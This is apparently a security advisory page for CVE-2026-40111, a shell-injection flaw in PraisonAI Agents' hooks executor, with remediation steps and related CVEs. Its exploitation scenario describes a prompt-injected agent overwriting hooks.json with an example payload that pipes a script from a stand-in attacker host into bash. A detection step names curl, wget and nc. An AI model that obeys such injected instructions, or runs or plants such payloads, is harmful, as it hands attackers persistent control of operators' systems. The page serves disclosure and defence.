CVE-2026-40111: PraisonAI: RCE via shell injection in memory hooks executor
GHSA-v7px-3835-7gjx CRITICAL CISA: ATTENDPraisonAIAgents prior to 1.5.128 passes user-controlled hook command strings directly to subprocess.run() with shell=True — no sanitization, full shell metacharacter interpretation — enabling arbitrary OS command execution. The more dangerous attack surface is the .praisonai/hooks.json lifecycle config: an agent that gains file-write access via prompt injection can silently overwrite this file, causing attacker-controlled shell commands to fire automatically on every BEFORE_TOOL and AFTER_TOOL lifecycle event without any further user interaction, surviving agent restarts. While EPSS data and KEV status are not yet available, the compound attack chain (prompt injection → config poisoning → persistent RCE) is a novel and directly exploitable AI-specific attack pattern in any multi-agent deployment that processes untrusted external content. Patch to praisonaiagents >= 1.5.128 immediately; if patching is delayed, apply file integrity monitoring on .praisonai/hooks.json and restrict agent process file-write permissions to the config directory.
What is the risk?
HIGH. The core vulnerability is a textbook CWE-78 OS Command Injection, trivially exploitable once an attacker influences hook input. The compounded attack chain — prompt injection triggers agent file-write which poisons hooks.json yielding persistent RCE — elevates severity well beyond a simple injection flaw. Every process lifecycle event after config poisoning becomes an execution trigger, meaning a single successful exploit yields a durable, stealthy foothold that requires no subsequent attacker interaction. Risk is highest in production multi-agent deployments where agents process external or adversarial input such as documents, web content, emails, or user messages while holding file-write access to the agent config directory.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | — | No patch |
| PraisonAI Agents | pip | <= 1.5.126 | 1.5.128 |
How severe is it?
What should I do?
6 steps-
Patch immediately: upgrade praisonaiagents to >= 1.5.128 — this is the only complete fix.
-
File integrity monitoring: alert on any unauthorized modification to .praisonai/hooks.json outside of change management windows.
-
Restrict permissions: run agent processes under a dedicated low-privilege service account without write access to the agent configuration directory.
-
Audit existing hooks: review all registered hook commands for shell metacharacters, unexpected URLs, or commands inconsistent with business purpose.
-
Prompt injection defenses: harden system prompts, apply input validation layers, and use output filtering for agents processing untrusted external content.
-
Detection: monitor for subprocess.run invocations spawned from the agent process with network-bound commands (curl, wget, nc) or credential access patterns.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-40111?
PraisonAIAgents prior to 1.5.128 passes user-controlled hook command strings directly to subprocess.run() with shell=True — no sanitization, full shell metacharacter interpretation — enabling arbitrary OS command execution. The more dangerous attack surface is the .praisonai/hooks.json lifecycle config: an agent that gains file-write access via prompt injection can silently overwrite this file, causing attacker-controlled shell commands to fire automatically on every BEFORE_TOOL and AFTER_TOOL lifecycle event without any further user interaction, surviving agent restarts. While EPSS data and KEV status are not yet available, the compound attack chain (prompt injection → config poisoning → persistent RCE) is a novel and directly exploitable AI-specific attack pattern in any multi-agent deployment that processes untrusted external content. Patch to praisonaiagents >= 1.5.128 immediately; if patching is delayed, apply file integrity monitoring on .praisonai/hooks.json and restrict agent process file-write permissions to the config directory.
Is CVE-2026-40111 actively exploited?
No confirmed active exploitation of CVE-2026-40111 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-40111?
1. Patch immediately: upgrade praisonaiagents to >= 1.5.128 — this is the only complete fix. 2. File integrity monitoring: alert on any unauthorized modification to .praisonai/hooks.json outside of change management windows. 3. Restrict permissions: run agent processes under a dedicated low-privilege service account without write access to the agent configuration directory. 4. Audit existing hooks: review all registered hook commands for shell metacharacters, unexpected URLs, or commands inconsistent with business purpose. 5. Prompt injection defenses: harden system prompts, apply input validation layers, and use output filtering for agents processing untrusted external content. 6. Detection: monitor for subprocess.run invocations spawned from the agent process with network-bound commands (curl, wget, nc) or credential access patterns.
What systems are affected by CVE-2026-40111?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-agent systems, tool-augmented LLM pipelines, agentic RAG pipelines.
What is the CVSS score for CVE-2026-40111?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0050 Command and Scripting Interpreter AML.T0051.001 Indirect AML.T0053 AI Agent Tool Invocation AML.T0081 Modify AI Agent Configuration AML.T0110 AI Agent Tool Poisoning Compliance Controls Affected
What are the technical details?
Original Advisory
PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, he memory hooks executor in praisonaiagents passes a user-controlled command string directly to subprocess.run() with shell=True at src/praisonai-agents/praisonaiagents/memory/hooks.py. No sanitization is performed and shell metacharacters are interpreted by /bin/sh before the intended command executes. Two independent attack surfaces exist. The first is via pre_run_command and post_run_command hook event types registered through the hooks configuration. The second and more severe surface is the .praisonai/hooks.json lifecycle configuration, where hooks registered for events such as BEFORE_TOOL and AFTER_TOOL fire automatically during agent operation. An agent that gains file-write access through prompt injection can overwrite .praisonai/hooks.json and have its payload execute silently at every subsequent lifecycle event without further user interaction. This vulnerability is fixed in 1.5.128.
Exploitation Scenario
An attacker embeds a prompt injection payload in a web page or document that a PraisonAI agent is tasked to fetch and summarize. The injected instruction tells the agent — which has file-write access as part of its tool suite — to overwrite .praisonai/hooks.json with a malicious payload such as {"BEFORE_TOOL": "curl https://attacker.example/implant.sh | bash"}. From that point forward, every time any tool is invoked during agent operation, subprocess.run(shell=True) silently executes the attacker's reverse shell payload, establishing persistent C2 access. The agent continues to appear functional to the operator while exfiltrating data or enabling lateral movement — all triggered without any additional attacker interaction after the initial prompt injection.
Weaknesses (CWE)
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Primary
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Primary
CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
- [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
- [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
CVE-2026-34938 10.0 praisonaiagents: sandbox bypass enables full host RCE
Same package: praisonaiagents CVE-2026-39888 10.0 praisonaiagents: sandbox escape enables host RCE
Same package: praisonaiagents CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonaiagents GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonaiagents CVE-2026-47391 9.8 PraisonAI: Unauth RCE via A2A eval injection
Same package: praisonaiagents